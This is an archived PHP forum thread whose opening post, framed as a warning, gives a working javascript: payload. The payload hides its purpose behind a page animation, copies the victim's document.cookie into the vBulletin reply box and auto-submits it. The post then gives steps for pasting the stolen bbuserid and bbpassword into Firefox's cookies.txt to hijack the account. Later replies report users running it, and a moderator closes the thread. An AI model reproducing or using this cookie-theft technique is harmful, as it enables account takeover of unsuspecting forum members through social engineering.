TalkPHP - Never visit JS links on a forum, here is why

TalkPHP (http://www.talkphp.com/forums.php)

- The Lounge (http://www.talkphp.com/lounge/)

- - Never visit JS links on a forum, here is why (http://www.talkphp.com/lounge/1353-never-visit-js-links-forum-here-why.html)

Never visit JS links on a forum, here is why

This sequence of things will allow you to hack a users account, with a little practice I was able to do it in about half a minute.

Step one: Make a thread like this one, it looks innocent (the code in that is), but use this code instead (WARNING: VISITING THIS WILL COMPROMISE YOUR ACCOUNT SECURITY).

PHP Code:


		
			
javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("table"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}document.getElementById('vB_Editor_QR_textarea').value=document.cookie;document.getElementById('qr_submit').click();setInterval('A()',50); void(0);

This code will print out all their cookies from this site.

Step 2: You wait till some sucker runs the javascript, check often. When it gets posted, copy the text on notepad (not wordpad to remove all formatting) and close firefox

Step 3: If you use firefox, go to [Drive Letter]:\Documents and Settings\[User Name]\Application Data\Mozilla\Firefox\Profiles\[profile name]

Step 4: Edit the following values in cookies.txt with the ones on the notepad window (from the forum site, of course)
bbpassword
bbuserid

Save and close window, re-open firefox and you will be logged into their account.

I am working on a video for this, I will post it if I get it.

Interesting i Guess, im not sure if we condone this here and we may have to remove this topic. Hacking is hacking, whether you are advising people or not, this is showing people how to hack, not telling people how to not get caught.

errr... is this a joke? =o

If a user is dumb enough to copy/paste the JS into their address bar and execute it, then you can have their account. :p On a more serious note, I don't see this as a problem since vBulletin just plain doesn't allow JavaScript to be injected anywhere. (that i know of)

Quote:

*Blows a kiss to Wildhoney*

Such a classic.

you could just say it's the super popular javascript image "trick", it looks like it.

erm guys, try what he has said lol. Copy the code into your browser, and it will make a post with your cookie details, all you then need to do is create the cookies with the exact same information and you have access to the account...

It works, just make sure you delete the post after :D

Quote:

Originally Posted by Salathe (Post 3470)

Correct, I tried a number of different methods and the only one is to put it in your URL bar.

Where will this "cookie" be posted? :|

On the thread the person who runs it is on. I've tried to do redirections, but it didnt work.

Code:

bblastactivity=0; bblastvisit=1193694492;bbthread_lastview=hash-stufff-%lulz%xD

something along those lines.

All you need is the user ID and encrypted password.

*removes cookie info*

I hope you know it isnt edited in the email for everyone who is subscribed to this thread.

Lol :) He tells us after everybody has tried it. Good going, VI, good going! Very sneaky.

Due to the security issues related to a thread alike this, i have closed the topic. If you feel this should not have been done, please PM me.

Good move. You probably want to log out and log back in for those who have tried this.